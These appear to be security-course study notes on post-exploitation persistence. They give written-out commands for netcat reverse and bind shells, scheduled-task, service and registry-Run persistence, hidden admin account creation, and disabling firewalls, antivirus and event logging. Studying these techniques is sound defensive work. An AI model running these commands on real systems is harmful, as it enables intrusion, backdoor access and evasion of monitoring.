Notes

Sec25 - Persistence

3 min read

Command and Control (C2) Techniques

  • Definition: Frameworks for remote control of compromised hosts
  • Empire
    • PowerShell/Python-based, stealthy (avoids powershell.exe)
    • Modules: keylogging, credential dumping, lateral movement
    • Maintained in Kali community
  • Covenant
    • .NET-based, cross-platform (Windows, Linux, macOS)
    • Web-based interface for managing implants
    • Use for executing .NET commands, dumping credentials, long-term access
  • Mythic
    • Cross-platform, CLI-focused, modular architecture
    • Supports custom payloads; robust API for automation

Automating Persistence

  • Scheduled Tasks & Cron Jobs
    • Windows: 
      schtasks /create /sc hourly /tn "UpdateCheck" /tr "C:\payload.exe"
      • schtasks: manage tasks
      • /sc hourly: run hourly
      • /tn "UpdateCheck": task name
      • /tr "C:\payload.exe": executable path
    • Unix: 
      0 * * * * /etc/payload.sh
      • Executes /etc/payload.sh at minute 0 every hour
  • Service Creation
    • Windows: 
      sc create "MaliciousService" binPath= "C:\path\payload.exe" start= auto
      • Creates service MaliciousService to run payload on boot
    • Unix:
      • Place script in /etc/init.d/ and run: 
        update-rc.d payload.sh defaults
      • Ensures script runs on startup
  • Registry Keys (Windows)
    • Persist payload via Run key: 
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MyPayload /t REG_SZ /d "C:\path\payload.exe"
      • Adds MyPayload entry to run on user login

Remote Shells

  • Definitions
    • Reverse Shell: Target initiates connection back to attacker, bypassing firewalls
    • Bind Shell: Target listens for connection; attacker connects to target port
  • Reverse Shell Example (Netcat)
    • Attacker Listener: 
      nc -lvp 4444
      • -l: listen mode; -v: verbose; -p 4444: port 4444
    • Target Command: 
      nc 10.0.0.2 4444 -e /bin/bash
      • Connects to attacker at 10.0.0.2:4444, spawns /bin/bash
  • Bind Shell Example (Netcat)
    • Target Setup: 
      nc -lvp 4444 -e /bin/bash
      • Listens on port 4444, executes /bin/bash upon connection
    • Attacker Connects: 
      nc 10.0.0.3 4444

Backdoors

  • Backdoors: bypass auth to gain/maintain access to system, network or app
  • Rootkits
    • Kernel-level software hiding processes and files
    • Example: ZeroAccess rootkit hides files, grants persistent kernel access
  • Trojans
    • Malware disguised as legitimate software to open backdoors
    • Example: Zeus Trojan steals banking credentials
  • Web Shells
    • Scripts uploaded to web server for remote control via HTTP
    • Example: China Chopper web shell provides command execution

Account Credentials

  • Credential Dumping
    • Extract credentials from memory or files
    • Tool Example: Mimikatz to dump plaintext passwords on Windows
  • Keylogging
    • Capture keystrokes to harvest usernames/passwords
    • Example: Emotet implants keylogger modules post-infection
  • Phishing Attacks
    • Craft emails/pages to trick users into revealing credentials
    • Example: 2016 attack on campaign staff using fake Google login
  • Adding New Accounts
    • Create hidden accounts for re-entry
    • Windows: 
      net user backup_admin P@ssw0rd /add
net localgroup administrators backup_admin /add
    • Linux: 
      sudo useradd -m -s /bin/bash backup_admin
echo "backup_admin:P@ssw0rd" | sudo chpasswd
sudo usermod -aG sudo backup_admin

Browser-Based Persistence

  • Malicious Browser Extensions
    • Hijack browser functions to capture data or execute code
    • Example: 2017 Copyfish extension hijack pushed ads
  • Cookies & Local Storage
    • Manipulate via XSS to steal session tokens
    • Example: 2018 Telegram web client vulnerability exploited local storage
  • Session Hijacking
    • Tools: FireSheep hijacks unencrypted cookies on open Wi-Fi
  • Browser Setting Modifications
    • Change homepage, proxy to redirect traffic
    • Example: Malicious script altering proxy to capture credentials
  • Defenses
    • Review/manage extensions regularly
    • Enforce HTTPS and Content Security Policy (CSP)
    • Keep browsers updated; audit for unusual behavior

Security Control Tampering

  • Disabling Firewalls
    • Windows: 
      netsh advfirewall set allprofiles state off
    • Linux (UFW): 
      ufw disable
    • Linux (firewalld): 
      systemctl stop firewalld
  • Disabling Antivirus
    • Windows Defender: Disable real-time protection via PowerShell
    • Linux (ClamAV): 
      systemctl stop clamav-freshclam
  • Tampering Security Policies
    • Windows: Export/import using secedit to weaken password/account policies
    • Linux: Modify PAM configurations in /etc/pam.d/ to allow stealth access
  • Disabling Security Logging
    • Windows: 
      sc stop EventLog
sc config EventLog start= disabled
    • Linux: 
      systemctl stop rsyslog
  • Persistence via Scheduled Tasks
    • Windows: 
      schtasks /create /tn "update" /tr "C:\update.bat" /sc onstart
    • Linux (cron): 
      crontab -e @reboot /etc/maliciousscript.sh
  • Disabling UAC
    • Windows: Modify UAC settings via registry or Local Security Policy
    • Linux: Weaken sudo by allowing passwordless execution in /etc/sudoers

Graph View